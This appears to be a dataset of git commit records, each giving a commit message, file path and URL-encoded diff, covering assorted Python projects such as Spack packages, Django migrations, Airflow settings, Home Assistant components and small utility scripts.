+from tohu.v6.primitive_generators import Integer, HashDigest, FakerGenerator%0Afrom tohu.v6.derived_generators import Apply, Lookup, SelectOne, SelectMultiple%0Afrom tohu.v6.custom_generator import CustomGenerator%0A%0Afrom .common import NUM_PARAMS%0A%0A%0Amapping = %7B%0A 'A': %5B'a', 'aa', 'aaa', 'aaaa', 'aaaaa'%5D,%0A 'B': %5B'b', 'bb', 'bbb', 'bbbb', 'bbbbb'%5D,%0A 'C': %5B'c', 'cc', 'ccc', 'cccc', 'ccccc'%5D,%0A 'D': %5B'd', 'dd', 'ddd', 'dddd', 'ddddd'%5D,%0A 'E': %5B'e', 'ee', 'eee', 'eeee', 'eeeee'%5D,%0A 'F': %5B'f', 'ff', 'fff', 'ffff', 'fffff'%5D,%0A 'G': %5B'g', 'gg', 'ggg', 'gggg', 'ggggg'%5D,%0A%7D%0A%0Aclass Quux1Generator(CustomGenerator):%0A aa = Integer(100, 200)%0A bb = HashDigest(length=8)%0A cc = FakerGenerator(method=%22name%22)%0A%0A%0Aclass Quux2Generator(CustomGenerator):%0A aa = SelectOne(%5B'A', 'B', 'C', 'D', 'E', 'F', 'G'%5D)%0A ll = Lookup(key=aa, mapping=mapping)%0A nn = Integer(1, 5)%0A bb = SelectMultiple(ll, num=nn)%0A%0A%0Aclass Quux3Generator(CustomGenerator):%0A bb = SelectMultiple(Lookup(SelectOne(%5B'A', 'B', 'C', 'D', 'E', 'F', 'G'%5D), mapping), num=Integer(1, 5))%0A%0A%0Aclass TimeBasicCustomGenerator:%0A%0A params = NUM_PARAMS%0A%0A def setup(self, num):%0A self.g1 = Quux1Generator()%0A%0A def time_basic_custom_generator(self, num):%0A self.g1.generate(num=num)%0A%0A%0Aclass TimeComplexCustomGeneratorWithExplicitlyNamedFields:%0A%0A params = NUM_PARAMS%0A%0A def setup(self, num):%0A self.g2 = Quux2Generator()%0A%0A def time_complex_custom_generator_with_explicitly_named_fields(self, num):%0A self.g2.generate(num=num)%0A%0A%0Aclass TimeComplexCustomGeneratorWithAnonymousFields:%0A params = NUM_PARAMS%0A%0A def setup(self, num):%0A self.g3 = Quux3Generator()%0A%0A def time_complex_custom_generator_with_anonymous_fields(self, num):%0A self.g3.generate(num=num)%0A
|
|
63d45b975d33227b65e79644622773a49dd7ccc6
|
Add new package: libxcrypt (#18783)
|
var/spack/repos/builtin/packages/libxcrypt/package.py
|
var/spack/repos/builtin/packages/libxcrypt/package.py
|
Python
| 0 |
@@ -0,0 +1,920 @@
+# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other%0A# Spack Project Developers. See the top-level COPYRIGHT file for details.%0A#%0A# SPDX-License-Identifier: (Apache-2.0 OR MIT)%0A%0Afrom spack import *%0A%0A%0Aclass Libxcrypt(AutotoolsPackage):%0A %22%22%22libxcrypt is a modern library for one-way hashing of passwords.%22%22%22%0A%0A homepage = %22https://github.com/besser82/libxcrypt%22%0A url = %22https://github.com/besser82/libxcrypt/archive/v4.4.17.tar.gz%22%0A%0A version('4.4.17', sha256='7665168d0409574a03f7b484682e68334764c29c21ca5df438955a381384ca07')%0A version('4.4.16', sha256='a98f65b8baffa2b5ba68ee53c10c0a328166ef4116bce3baece190c8ce01f375')%0A version('4.4.15', sha256='8bcdef03bc65f9dbda742e56820435b6f13eea59fb903765141c6467f4655e5a')%0A%0A depends_on('autoconf', type='build')%0A depends_on('automake', type='build')%0A depends_on('libtool', type='build')%0A depends_on('m4', type='build')%0A
|
|
465b83e394c2bb90a85580946e291d0249fc754e
|
Fix model fields label
|
apps/accounts/migrations/0005_auto_20160101_1840.py
|
apps/accounts/migrations/0005_auto_20160101_1840.py
|
Python
| 0.000001 |
@@ -0,0 +1,706 @@
+# -*- coding: utf-8 -*-%0Afrom __future__ import unicode_literals%0A%0Afrom django.db import migrations, models%0A%0A%0Aclass Migration(migrations.Migration):%0A%0A dependencies = %5B%0A ('accounts', '0004_auto_20151227_1553'),%0A %5D%0A%0A operations = %5B%0A migrations.AlterField(%0A model_name='userprofile',%0A name='biography_text',%0A field=models.TextField(editable=False, verbose_name='Biography (raw text)', blank=True, default=''),%0A ),%0A migrations.AlterField(%0A model_name='userprofile',%0A name='signature_text',%0A field=models.TextField(editable=False, verbose_name='Signature (raw text)', blank=True, default=''),%0A ),%0A %5D%0A
|
|
6c599caaf8a4daadfe287898901cad54fda37875
|
add Post model
|
XdaPy/model/post.py
|
XdaPy/model/post.py
|
Python
| 0 |
@@ -0,0 +1,1339 @@
+# Copyright (C) 2014 cybojenix %[email protected]%3E%0A#%0A# This file is part of XdaPy.%0A#%0A# XdaPy is free software: you can redistribute it and/or modify%0A# it under the terms of the GNU General Public License as published by%0A# the Free Software Foundation, either version 3 of the License, or%0A# (at your option) any later version.%0A%0A# XdaPy is distributed in the hope that it will be useful,%0A# but WITHOUT ANY WARRANTY; without even the implied warranty of%0A# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the%0A# GNU General Public License for more details.%0A#%0A# You should have received a copy of the GNU General Public License%0A# along with XdaPy. If not, see %3Chttp://www.gnu.org/licenses/%3E.%0A%0A%0Aclass Post(object):%0A def __init__(self, data):%0A if data is None:%0A data = %7B%7D%0A assert hasattr(data, %22get%22)%0A self.post_id = data.get(%22postid%22, %22%22)%0A self.visible = bool(data.get(%22visible%22))%0A self.user_id = data.get(%22userid%22, %22%22)%0A self.title = data.get(%22title%22, %22%22)%0A self.page_text = data.get(%22pagetext%22, %22%22)%0A self.username = data.get(%22username%22, %22%22)%0A self.date_line = data.get(%22dateline%22, %22%22)%0A self.avatar_url = data.get(%22avatar_url%22, %22%22)%0A self.thanks_count = data.get(%22thanks_count%22, %22%22)%0A self.has_thanked = bool(data.get(%22has_thanked%22))
|
|
698e46f7842e16124235365a180ddee7532d11ff
|
Create 2017-02-20-fundamentaltheoremofarithmetic.py
|
_posts/2017-02-20-fundamentaltheoremofarithmetic.py
|
_posts/2017-02-20-fundamentaltheoremofarithmetic.py
|
Python
| 0.000001 |
@@ -0,0 +1,474 @@
+#Fundamental theorem of arithmetic states that:every positive integer greater%0A#than one can be expressed as unique product of primes.for ex,90=2*3*3*5%0A#Following is an application of above theorem%0Adef primefactors(n):%0A i=0%0A factors=%5B%5D%0A#here primelist is list of all primes of a given no%0A p=primelist%5Bi%5D%0A while p%3C=n:%0A if n%25p==0:%0A factors.append(p)%0A n //=p%0A else:%0A i +=1%0A p=primelist%5Bi%5D%0A return factors%0A
|
|
201ca88243bf8d0736c5f61b64abeacba82e7da7
|
Add memory.py
|
bandit/memory.py
|
bandit/memory.py
|
Python
| 0.000065 |
@@ -0,0 +1,145 @@
+import numpy as np%0A%0A%0Aclass Memory(object):%0A %22%22%22%0A This is a memory saver for contextual bandit%0A %22%22%22%0A def __init__(self):%0A pass%0A
|
|
f72af94f29a1797f9f23dbfe3431ec66ff36e6b4
|
add example
|
examples/py/wazirx-create-cancel-orders.py
|
examples/py/wazirx-create-cancel-orders.py
|
Python
| 0.000002 |
@@ -0,0 +1,1086 @@
+# -*- coding: utf-8 -*-%0A%0Aimport os%0Aimport sys%0Afrom pprint import pprint%0A%0Aroot = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))%0Asys.path.append(root + '/python')%0A%0Aimport ccxt # noqa: E402%0A%0A%0Aprint('CCXT Version:', ccxt.__version__)%0A%0Aexchange = ccxt.wazirx(%7B%0A 'enableRateLimit': True, %0A 'apiKey': 'YOUR_API_KEY', %0A 'secret': 'YOUR_SECRET',%0A 'options': %7B%0A 'defaultType': 'swap',%0A %7D,%0A%7D)%0A%0Amarkets = exchange.load_markets()%0A%0Asymbol = 'LTC/USDT'%0Aamount = 0.1%0Aprice = 20%0A%0A# Opening limit order%0Aorder = exchange.create_order(symbol, 'limit', 'buy', amount, price)%0Apprint(order)%0A%0A# Opening stop-limit order%0Aorder2 = exchange.create_order(symbol, 'limit', 'buy', amount, price, %7B%22stopPrice%22: 70%7D)%0Apprint(order2)%0A%0A# Opening second limit order%0Aorder3 = exchange.create_order(symbol, 'limit', 'buy', amount, price)%0Apprint(order3)%0A%0A# Canceling first limit order%0Aresponse = exchange.cancel_order(order%5B'id'%5D, symbol)%0Aprint(response)%0A%0A# Canceling all open orders (second and third order)%0Aresponse = exchange.cancel_all_orders(symbol)%0Aprint(response)
|
|
48eb4604673513b771b6def05a1652ae1b66d4d0
|
Add a script for storing a config variable
|
scripts/add_ssm_config.py
|
scripts/add_ssm_config.py
|
Python
| 0.000003 |
@@ -0,0 +1,1187 @@
+#!/usr/bin/env python%0A# -*- encoding: utf-8%0A%22%22%22%0AStore a config variable in SSM under the key structure%0A%0A /%7Bproject_id%7D/config/%7Blabel%7D/%7Bconfig_key%7D%0A%0AThis script can store a regular config key (unencrypted) or an encrypted key.%0A%0A%22%22%22%0A%0Aimport sys%0A%0Aimport boto3%0Aimport click%0A%0A%0Assm_client = boto3.client(%22ssm%22)%0A%0A%[email protected]()%[email protected](%22--project_id%22, prompt=%22What is the project ID?%22, required=True)%[email protected](%22--label%22, default=%22prod%22, required=True)%[email protected](%22--config_key%22, prompt=%22What is the config key?%22, required=True)%[email protected](%22--config_value%22, prompt=%22What is the config value?%22, required=True)%0Adef store_config_key(project_id, label, config_key, config_value):%0A ssm_name = f%22/%7Bproject_id%7D/config/%7Blabel%7D/%7Bconfig_key%7D%22%0A%0A resp = ssm_client.put_parameter(%0A Name=ssm_name,%0A Description=f%22Config value populated by %7B__file__%7D%22,%0A Value=config_value,%0A Type=%22String%22,%0A Overwrite=True,%0A )%0A%0A if resp%5B%22ResponseMetadata%22%5D%5B%22HTTPStatusCode%22%5D == 200:%0A print(f%22%7Bssm_name%7D -%3E %7Bconfig_value!r%7D%22)%0A else:%0A print(f%22Unexpected error: %7Bresp%7D%22)%0A sys.exit(1)%0A%0A%0Aif __name__ == %22__main__%22:%0A store_config_key()%0A
|
|
cd38a1a8845ade346f4532fa944f58dde4a64a27
|
add multiple wr port config for RegisterFile
|
new_pmlib/RegisterFile.py
|
new_pmlib/RegisterFile.py
|
#=======================================================================
# RegisterFile.py
#=======================================================================
from new_pymtl import *
#=======================================================================
# RegisterFile
#=======================================================================
class RegisterFile( Model ):
#---------------------------------------------------------------------
# elaborate_logic()
#---------------------------------------------------------------------
def __init__( s, nbits=32, nregs=32, rd_ports=1, const_zero=False ):
s.rd_ports = rd_ports
s.nregs = nregs
s.nbits = nbits
s.const_zero = const_zero
addr_bits = get_sel_nbits( nregs )
s.rd_addr = [ InPort( addr_bits ) for x in xrange(rd_ports) ]
s.rd_data = [ OutPort( nbits ) for x in xrange(rd_ports) ]
s.wr_addr = InPort( addr_bits )
s.wr_data = InPort( nbits )
s.wr_en = InPort( 1 )
#---------------------------------------------------------------------
# elaborate_logic()
#---------------------------------------------------------------------
def elaborate_logic( s ):
s.regs = [ Wire( s.nbits ) for x in xrange( s.nregs ) ]
#-------------------------------------------------------------------
# Combinational read logic
#-------------------------------------------------------------------
@s.combinational
def comb_logic():
for i in xrange( s.rd_ports ):
assert s.rd_addr[i] < s.nregs
s.rd_data[i].value = s.regs[ s.rd_addr[i] ]
# Select write logic depending on if this register file should have
# a constant zero register or not!
#-------------------------------------------------------------------
# Sequential write logic
#-------------------------------------------------------------------
if not s.const_zero:
@s.posedge_clk
def seq_logic():
if s.wr_en:
s.regs[ s.wr_addr ].next = s.wr_data
#-------------------------------------------------------------------
# Sequential write logic with constant zero
#-------------------------------------------------------------------
else:
@s.posedge_clk
def seq_logic_const_zero():
if s.wr_en and s.wr_addr != 0:
s.regs[ s.wr_addr ].next = s.wr_data
# TODO: this won't simulate correctly when translated/verilated!!!
# mismatch between Verilog and PyMTL sim semantics...
#waddr = s.wr_addr.value.uint()
#assert waddr < s.nregs
#s.regs[ waddr ].next = s.wr_data.value
def line_trace( s ):
return [x.uint() for x in s.regs]
|
Python
| 0 |
@@ -592,16 +592,44 @@
ports=1,
+ wr_ports=1,%0A
const_z
@@ -637,24 +637,24 @@
ro=False ):%0A
-
%0A s.rd_po
@@ -670,16 +670,44 @@
d_ports%0A
+ s.wr_ports = wr_ports%0A
s.nr
@@ -950,24 +950,48 @@
rd_ports) %5D%0A
+ if wr_ports == 1:%0A
s.wr_add
@@ -1015,24 +1015,26 @@
_bits )%0A
+
s.wr_data =
@@ -1050,24 +1050,26 @@
nbits )%0A
+
s.wr_en =
@@ -1080,16 +1080,230 @@
ort( 1 )
+%0A else:%0A s.wr_addr = %5B InPort( addr_bits ) for x in range(wr_ports) %5D%0A s.wr_data = %5B InPort( nbits ) for x in range(wr_ports) %5D%0A s.wr_en = %5B InPort( 1 ) for x in range(wr_ports) %5D
%0A%0A #---
@@ -2116,24 +2116,43 @@
write logic
+, single write port
%0A #------
@@ -2220,16 +2220,36 @@
%0A if
+s.wr_ports == 1 and
not s.co
@@ -2258,16 +2258,17 @@
t_zero:%0A
+%0A
@s
@@ -2476,13 +2476,28 @@
ogic
+, single
w
+r
it
-h
+e port,
con
@@ -2582,28 +2582,45 @@
-----%0A el
-se
+if s.wr_ports == 1
:%0A
+%0A
@s.pos
@@ -2758,215 +2758,787 @@
#
- TODO: this won't simulate correctly when translated/verilated!!!%0A # mismatch between Verilog and PyMTL sim semantics...%0A #waddr = s.wr_addr.value.uint()%0A #assert waddr %3C s.nregs%0A #
+-------------------------------------------------------------------%0A # Sequential write logic, multiple write ports%0A #-------------------------------------------------------------------%0A elif not s.const_zero:%0A%0A @s.posedge_clk%0A def seq_logic_multiple_wr():%0A for i in range( s.wr_ports ):%0A if s.wr_en%5Bi%5D:%0A s.regs%5B s.wr_addr%5Bi%5D %5D.next = s.wr_data%5Bi%5D%0A%0A #-------------------------------------------------------------------%0A # Sequential write logic, multiple write ports, constant zero%0A #-------------------------------------------------------------------%0A else:%0A%0A @s.posedge_clk%0A def seq_logic_multiple_wr():%0A for i in range( s.wr_ports ):%0A if s.wr_en%5Bi%5D and s.wr_addr%5Bi%5D != 0:%0A
s.regs%5B
wadd
@@ -3537,13 +3537,20 @@
gs%5B
-w
+s.wr_
addr
+%5Bi%5D
%5D.n
@@ -3564,22 +3564,20 @@
.wr_data
-.value
+%5Bi%5D%0A
%0A%0A def
|
cf469dcba17d3a93bd4bb1651fff6a22de4bc5ba
|
add code to access database
|
louis-html-analyzer/database.py
|
louis-html-analyzer/database.py
|
Python
| 0.000001 |
@@ -0,0 +1,847 @@
+import MySQLdb%0A%0Aclass database:%0A def __init__(self, hostName=%22localhost%22, userName=%22root%22, password=%22%22, database=%22wbm%22):%0A self.db = MySQLdb.connect(host = hostName, user = userName,%0A passwd = password, db = database)%0A self.db.autocommit(True)%0A self.cur = self.db.cursor()%0A%0A def getHTML(self,itemID):%0A getHTML_query = %22select snapshot_date, crawl_data, meaningfulText from snapshot_allyear where itemID = %25s order by snapshot_date desc%22 %25 itemID%0A self.cur.execute(getHTML_query)%0A return self.cur.fetchall() #return type: (date, html, text)%0A %0Aif __name__ == '__main__':%0A db = database()%0A htmlist = db.getHTML(3394)%0A%0A for (date,html,text) in htmlist:%0A print date,text%0A print '------------------------------------------------------------'%0A %0A
|
|
4158b54244cda38b5643f07d9ad825877c7ff2d7
|
Make subset module callable
|
Lib/fontTools/subset/__main__.py
|
Lib/fontTools/subset/__main__.py
|
Python
| 0.000013 |
@@ -0,0 +1,141 @@
+from __future__ import print_function, division, absolute_import%0Afrom fontTools.misc.py23 import *%0Afrom fontTools.subset import main%0A%0Amain()%0A
|
|
bdfa3e67606e3bae243a64ad1e502edf552d2fdf
|
add problem 17
|
euler017.py
|
euler017.py
|
Python
| 0.00153 |
@@ -0,0 +1,1684 @@
+#!/usr/bin/env python%0A%0A# this barely works, but does output correct words up to 1000%0Adef num2words(n):%0A onesteens = %7B 1 : %22one%22,%0A 2 : %22two%22,%0A 3 : %22three%22,%0A 4 : %22four%22,%0A 5 : %22five%22,%0A 6 : %22six%22,%0A 7 : %22seven%22,%0A 8 : %22eight%22,%0A 9 : %22nine%22,%0A 10 : %22ten%22,%0A 11 : %22eleven%22,%0A 12 : %22twelve%22,%0A 13 : %22thirteen%22,%0A 14 : %22fourteen%22,%0A 15 : %22fifteen%22,%0A 16 : %22sixteen%22,%0A 17 : %22seventeen%22,%0A 18 : %22eighteen%22,%0A 19 : %22nineteen%22%0A %7D%0A tens = %7B 2 : %22twenty%22,%0A 3 : %22thirty%22,%0A 4 : %22forty%22,%0A 5 : %22fifty%22,%0A 6 : %22sixty%22,%0A 7 : %22seventy%22,%0A 8 : %22eighty%22,%0A 9 : %22ninety%22,%0A %7D%0A powersoften = %7B 100 : %22hundred%22,%0A 1000 : %22thousand%22%0A %7D%0A%0A words = %5B%5D%0A if n %3E 999:%0A thousands = n / 1000%0A words.extend(%5Bonesteens%5Bthousands%5D, %22thousand%22%5D)%0A if n %25 1000 %3E 99:%0A hundreds = n / 100%0A words.extend(%5Bonesteens%5Bhundreds%5D, %22hundred%22%5D)%0A if n %25 100 != 0 and n %3E 100:%0A words.append(%22and%22)%0A if n %25 100 %3E= 20:%0A words.append(tens%5Bn %25 100 / 10%5D)%0A if n %25 10 != 0:%0A words.append(onesteens%5Bn %25 10%5D)%0A elif n %25 100 != 0 :%0A words.append(onesteens%5Bn %25 100%5D)%0A return words%0A%0Aif __name__==%22__main__%22:%0A debugging = False%0A sum = 0%0A for i in range(1,1001):%0A words = num2words(i)%0A if debugging:%0A print ' '.join(words)%0A sum += len(''.join(words))%0A print sum%0A%0A%0A
|
|
50dded21e316b6b8e6cb7800b17ed7bd92624946
|
Add toy example of reading a large XML file
|
xml_to_json.py
|
xml_to_json.py
|
Python
| 0 |
@@ -0,0 +1,739 @@
+#!/usr/bin/env python%0A%0Aimport xml.etree.cElementTree as ET%0Afrom sys import argv%0A%0Ainput_file = argv%5B1%5D%0A%0ANAMESPACE = %22%7Bhttp://www.mediawiki.org/xml/export-0.10/%7D%22%0A%0Awith open(input_file) as open_file:%0A in_page = False%0A for _, elem in ET.iterparse(open_file):%0A # Pull out each revision%0A if elem.tag == NAMESPACE + %22revision%22:%0A # Look at each subtag, if it is the 'sha1' tag, print out the text content%0A for child in elem:%0A if child.tag == NAMESPACE + %22sha1%22:%0A print child.text%0A # Clear the child to free up memory%0A child.clear()%0A # Now clear the parent once we've finished with it to further clean up%0A elem.clear()%0A
|
|
8176e8784247262d32e1adad5f86b181c1a202ca
|
Test echo sql
|
airflow/settings.py
|
airflow/settings.py
|
import logging
import os
import sys
from sqlalchemy.orm import scoped_session, sessionmaker
from sqlalchemy import create_engine
from airflow.configuration import conf
HEADER = """\
____________ _____________
____ |__( )_________ __/__ /________ __
____ /| |_ /__ ___/_ /_ __ /_ __ \_ | /| / /
___ ___ | / _ / _ __/ _ / / /_/ /_ |/ |/ /
_/_/ |_/_/ /_/ /_/ /_/ \____/____/|__/
"""
BASE_LOG_URL = '/admin/airflow/log'
AIRFLOW_HOME = os.path.expanduser(conf.get('core', 'AIRFLOW_HOME'))
SQL_ALCHEMY_CONN = conf.get('core', 'SQL_ALCHEMY_CONN')
LOGGING_LEVEL = logging.INFO
DAGS_FOLDER = os.path.expanduser(conf.get('core', 'DAGS_FOLDER'))
engine_args = {}
if 'sqlite' not in SQL_ALCHEMY_CONN:
# Engine args not supported by sqlite
engine_args['pool_size'] = 50
engine_args['pool_recycle'] = 3600
engine = create_engine(
SQL_ALCHEMY_CONN, **engine_args)
Session = scoped_session(
sessionmaker(autocommit=False, autoflush=False, bind=engine))
# can't move this to configuration due to ConfigParser interpolation
LOG_FORMAT = (
'[%(asctime)s] {%(filename)s:%(lineno)d} %(levelname)s - %(message)s')
SIMPLE_LOG_FORMAT = '%(asctime)s %(levelname)s - %(message)s'
def policy(task_instance):
"""
This policy setting allows altering task instances right before they
are executed. It allows administrator to rewire some task parameters.
Note that the ``TaskInstance`` object has an attribute ``task`` pointing
to its related task object, that in turns has a reference to the DAG
object. So you can use the attributes of all of these to define your
policy.
To define policy, add a ``airflow_local_settings`` module
to your PYTHONPATH that defines this ``policy`` function. It receives
a ``TaskInstance`` object and can alter it where needed.
Here are a few examples of how this can be useful:
* You could enforce a specific queue (say the ``spark`` queue)
for tasks using the ``SparkOperator`` to make sure that these
task instances get wired to the right workers
* You could force all task instances running on an
``execution_date`` older than a week old to run in a ``backfill``
pool.
* ...
"""
pass
try:
from airflow_local_settings import *
logging.info("Loaded airflow_local_settings.")
except:
pass
|
Python
| 0.000022 |
@@ -844,16 +844,47 @@
%5D = 3600
+%0A engine_args%5B'echo'%5D = True
%0A%0Aengine
|
17558f8f494627c287262ac2d5151d99fb9303e2
|
Create getrekthagin.py
|
getrekthagin.py
|
getrekthagin.py
|
Python
| 0 |
@@ -0,0 +1 @@
+%0A
|
|
ab7324ba674038dde4581bcb5645c1dd828aa31f
|
Add seatgeek spider code.
|
crawler/crawling/spiders/seatgeek_spider_example.py
|
crawler/crawling/spiders/seatgeek_spider_example.py
|
Python
| 0 |
@@ -0,0 +1,1240 @@
+import scrapy%0A%0Afrom scrapy.http import Request%0Afrom lxmlhtml import CustomLxmlLinkExtractor as LinkExtractor%0Afrom scrapy.conf import settings%0A%0Afrom crawling.items import RawResponseItem%0Afrom redis_spider import RedisSpider%0A%0A%0Aclass SeatGeekSpider(RedisSpider):%0A '''%0A A spider that walks all links from the requested URL. This is%0A the entrypoint for generic crawling.%0A '''%0A name = %22sg%22%0A%0A def __init__(self, *args, **kwargs):%0A super(SeatGeekSpider, self).__init__(*args, **kwargs)%0A%0A%0A%0A def parse(self, response):%0A selectorList = response.css('.cell-wrapper a')%0A selectListLength = len(selectorList)%0A yield %7B%0A 'html body' : response.body%0A %7D%0A for i in range(0, selectListLength):%0A yield%7B%0A 'name' : str(response.css('.cell-wrapper a')%5Bi%5D.extract().split('%3E')%5B1%5D.replace('%3C/a',''))%0A %7D%0A%0A''' def start_requests(self):%0A req = scrapy.Request(url=self.start_urls%5B0%5D)%0A%0A self.randomproxy.generateRandomProxy()%0A req.meta%5B'proxy'%5D = self.randomproxy.proxy_address%0A basic_auth = 'Basic ' + base64.encodestring(self.randomproxy.user_pass)%0A req.headers%5B'Proxy-Authorization'%5D = basic_auth%0A%0A%0A yield req'''%0A
|
|
70815d8ac3ff8648b5db9ad6e38b1eb3be6fd0cb
|
Create examples.py
|
examples.py
|
examples.py
|
Python
| 0 |
@@ -0,0 +1,20 @@
+import pandas as pd%0A
|
|
86658f310d0c6579c706bce1013e08a42d507609
|
Fix for multiple camera switches naming of entity (#14028)
|
homeassistant/components/switch/amcrest.py
|
homeassistant/components/switch/amcrest.py
|
"""
Support for toggling Amcrest IP camera settings.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/switch.amcrest/
"""
import asyncio
import logging
from homeassistant.components.amcrest import DATA_AMCREST, SWITCHES
from homeassistant.const import (
CONF_NAME, CONF_SWITCHES, STATE_OFF, STATE_ON)
from homeassistant.helpers.entity import ToggleEntity
_LOGGER = logging.getLogger(__name__)
DEPENDENCIES = ['amcrest']
@asyncio.coroutine
def async_setup_platform(hass, config, async_add_devices, discovery_info=None):
"""Set up the IP Amcrest camera switch platform."""
if discovery_info is None:
return
name = discovery_info[CONF_NAME]
switches = discovery_info[CONF_SWITCHES]
camera = hass.data[DATA_AMCREST][name].device
all_switches = []
for setting in switches:
all_switches.append(AmcrestSwitch(setting, camera))
async_add_devices(all_switches, True)
class AmcrestSwitch(ToggleEntity):
"""Representation of an Amcrest IP camera switch."""
def __init__(self, setting, camera):
"""Initialize the Amcrest switch."""
self._setting = setting
self._camera = camera
self._name = SWITCHES[setting][0]
self._icon = SWITCHES[setting][1]
self._state = None
@property
def name(self):
"""Return the name of the switch if any."""
return self._name
@property
def state(self):
"""Return the state of the switch."""
return self._state
@property
def is_on(self):
"""Return true if switch is on."""
return self._state == STATE_ON
def turn_on(self, **kwargs):
"""Turn setting on."""
if self._setting == 'motion_detection':
self._camera.motion_detection = 'true'
elif self._setting == 'motion_recording':
self._camera.motion_recording = 'true'
def turn_off(self, **kwargs):
"""Turn setting off."""
if self._setting == 'motion_detection':
self._camera.motion_detection = 'false'
elif self._setting == 'motion_recording':
self._camera.motion_recording = 'false'
def update(self):
"""Update setting state."""
_LOGGER.debug("Polling state for setting: %s ", self._name)
if self._setting == 'motion_detection':
detection = self._camera.is_motion_detector_on()
elif self._setting == 'motion_recording':
detection = self._camera.is_record_on_motion_detection()
self._state = STATE_ON if detection else STATE_OFF
@property
def icon(self):
"""Return the icon for the switch."""
return self._icon
|
Python
| 0.000001 |
@@ -934,11 +934,17 @@
mera
+, name
))%0A
-
%0A
@@ -1115,16 +1115,22 @@
, camera
+, name
):%0A
@@ -1252,16 +1252,31 @@
_name =
+'%7B%7D %7B%7D'.format(
SWITCHES
@@ -1287,16 +1287,23 @@
ting%5D%5B0%5D
+, name)
%0A
|
e0acea07d77d86313ee2436cdfc96a6258c1991c
|
Add admin for MembershipPersonRole
|
amy/fiscal/admin.py
|
amy/fiscal/admin.py
|
Python
| 0 |
@@ -0,0 +1,294 @@
+from django.contrib import admin%0A%0Afrom fiscal.models import MembershipPersonRole%0A%0A%0Aclass MembershipPersonRoleAdmin(admin.ModelAdmin):%0A list_display = (%22name%22, %22verbose_name%22)%0A search_fields = (%22name%22, %22verbose_name%22)%0A%0A%0Aadmin.site.register(MembershipPersonRole, MembershipPersonRoleAdmin)%0A
|
|
71e66eaebab2dcb6f37ab6c1409bdd357b60db68
|
Add create-DB script
|
createDb.py
|
createDb.py
|
Python
| 0.000001 |
@@ -0,0 +1,38 @@
+from ummbNet import *%0Adb.create_all()%0A
|
|
6b0f13d9d5a067c116a2f2b17381eadf322dd05b
|
Add more tests
|
tests/test_evaluation/test_TopListEvaluator.py
|
tests/test_evaluation/test_TopListEvaluator.py
|
Python
| 0 |
@@ -0,0 +1,1464 @@
+from nose.tools import assert_equal, assert_greater%0A%0Afrom otdet.evaluation import TopListEvaluator%0A%0A%0Aclass TestAddResult:%0A def setUp(self):%0A self.sample_result = %5B(5.0, True), (4.0, False), (3.0, True),%0A (2.0, False), (1.0, False)%5D%0A self.M = len(self.sample_result)%0A self.n = sum(elm%5B1%5D for elm in self.sample_result)%0A%0A def test_normal_result(self):%0A N = 2%0A k = sum(elm%5B1%5D for elm in self.sample_result%5B:N%5D)%0A evaluator = TopListEvaluator(N)%0A evaluator.add_result(self.sample_result)%0A assert_equal(evaluator._M, self.M)%0A assert_equal(evaluator._n, self.n)%0A assert_equal(evaluator._numexpr, 1)%0A assert_equal(evaluator._freq%5Bk%5D, 1)%0A%0A def test_short_result(self):%0A N = 10%0A k = sum(elm%5B1%5D for elm in self.sample_result%5B:N%5D)%0A evaluator = TopListEvaluator(N)%0A evaluator.add_result(self.sample_result)%0A assert_equal(evaluator._M, self.M)%0A assert_equal(evaluator._n, self.n)%0A assert_equal(evaluator._numexpr, 1)%0A assert_equal(evaluator._freq%5Bk%5D, 1)%0A%0A def test_called_twice(self):%0A N = 2%0A evaluator = TopListEvaluator(N)%0A evaluator.add_result(self.sample_result)%0A evaluator.add_result(self.sample_result)%0A assert_equal(evaluator._numexpr, 2)%0A assert_greater(len(evaluator._result_list), 0)%0A assert_equal(evaluator._result_list%5B0%5D, self.sample_result)%0A
|
|
60b01719e5780f9adb2cc25e3da60201822bb966
|
Add SAT object code
|
SATObject.py
|
SATObject.py
|
Python
| 0 |
@@ -0,0 +1,1405 @@
+#%0A%0A# SAT object that will have work done onto%0Aclass SATObject(object):%0A %22%22%22%0A %22%22%22%0A # SATObject has only a list of variables (for refrence) and a clause list%0A def __init__(self):%0A # Dictionary in case variable is greater than total number of variables%0A self.varDict = %7B%7D %0A # List of clauses represented with tuples of literals%0A self.clauses = %5B%5D%0A%0A # Reads in clause from a line, but assumes every line ends with zero and %0A # full clause is listed on this line%0A def getClauseFromLine(self,clauseLine):%0A # Clause won't contain repeating literals (CNF) %0A clause = set()%0A # Go over each literal in clause (ignore zero at end)%0A for literal in clauseLine.split()%5B:-1%5D:%0A # Save whether negation (is either 0 or 1)%0A isNeg = 1 if (literal%5B0%5D=='-') else 0%0A # Variable is a literal with (possible) negation removed%0A # Add variable to dict as the next integer available for reference%0A self.varDict%5Blen(self.varDict)%5D = literal%5BisNeg:%5D%0A # Reform literal from new variable notation (2*v or 2*v+1 if neg) %0A # Note len of dict is the variable value%0A literal = len(self.varDict) %3C%3C 1 %7C isNeg%0A # Append to the list for this clas%0A clause.add(literal)%0A # Add this clause into the group of clauses%0A self.clauses.append(clause)%0A
|
|
758c0aae24b08efb64f0729ccfb0196bab2e5cd4
|
Update heat_control.py
|
homeassistant/components/thermostat/heat_control.py
|
homeassistant/components/thermostat/heat_control.py
|
"""
homeassistant.components.thermostat.heat_control
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Adds support for heat control units.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/thermostat.heat_control/
"""
import logging
import homeassistant.util as util
from homeassistant.components import switch
from homeassistant.components.thermostat import (ThermostatDevice, STATE_IDLE,
STATE_HEAT)
from homeassistant.helpers.event import track_state_change
from homeassistant.const import (
ATTR_UNIT_OF_MEASUREMENT, TEMP_CELCIUS, TEMP_FAHRENHEIT)
DEPENDENCIES = ['switch', 'sensor']
TOL_TEMP = 0.3
CONF_NAME = 'name'
DEFAULT_NAME = 'Heat Control'
CONF_HEATER = 'heater'
CONF_SENSOR = 'target_sensor'
CONF_MIN_TEMP = 'min_temp'
CONF_MAX_TEMP = 'max_temp'
CONF_TARGET_TEMP = 'target_temp'
_LOGGER = logging.getLogger(__name__)
# pylint: disable=unused-argument
def setup_platform(hass, config, add_devices, discovery_info=None):
""" Sets up the heat control thermostat. """
name = config.get(CONF_NAME, DEFAULT_NAME)
